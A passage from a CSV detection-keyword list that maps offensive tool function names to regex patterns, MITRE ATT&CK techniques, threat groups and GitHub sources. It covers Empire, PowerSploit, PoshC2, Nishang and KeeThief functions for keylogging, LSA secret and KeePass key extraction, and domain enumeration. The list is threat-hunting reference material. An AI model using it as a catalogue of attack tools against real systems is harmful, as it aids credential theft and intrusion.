open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*Get-KeePassINIFields*",".{0,1000}Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeePassXMLFields*",".{0,1000}Get\-KeePassXMLFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeystrokeData*",".{0,1000}Get\-KeystrokeData.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-Keystrokes *",".{0,1000}Get\-Keystrokes\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-keystrokes*",".{0,1000}get\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-Killdate*",".{0,1000}Get\-Killdate.{0,1000}","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*get-killdate*",".{0,1000}get\-killdate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-KIWI_KERBEROS_LOGON_SESSION*",".{0,1000}Get\-KIWI_KERBEROS_LOGON_SESSION.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*Get-LastLoggedon -*",".{0,1000}Get\-LastLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-LastLoggedOn*",".{0,1000}Get\-LastLoggedOn.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*getLocalAdm*",".{0,1000}getLocalAdm.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Get-LoggedOnLocal -*",".{0,1000}Get\-LoggedOnLocal\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetLoggedOnUsersRegistry.cs*",".{0,1000}GetLoggedOnUsersRegistry\.cs.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","8","8","N/A","N/A","N/A","N/A" "*getLogger(""NemesisConnector"")*",".{0,1000}getLogger\(\""NemesisConnector\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Get-LolDrivers*",".{0,1000}Get\-LolDrivers\s.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-LsaRunAsPPLStatus*",".{0,1000}Get\-LsaRunAsPPLStatus.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-LSASecret*",".{0,1000}Get\-LSASecret.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-LSASecret.ps1*",".{0,1000}Get\-LSASecret\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-LSASecrets.ps1*",".{0,1000}Get\-LSASecrets\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-ModifiableService*",".{0,1000}Get\-ModifiableService.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NestedGroupMembership *",".{0,1000}Get\-NestedGroupMembership\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Get-NestedGroupMembership.ps1*",".{0,1000}Get\-NestedGroupMembership\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Get-NetComputer -Unconstrainuser*",".{0,1000}Get\-NetComputer\s\-Unconstrainuser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetDomainController*",".{0,1000}Get\-NetDomainController.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetDomainTrust*",".{0,1000}Get\-NetDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*get-netfileserver -domain *",".{0,1000}get\-netfileserver\s\-domain\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" 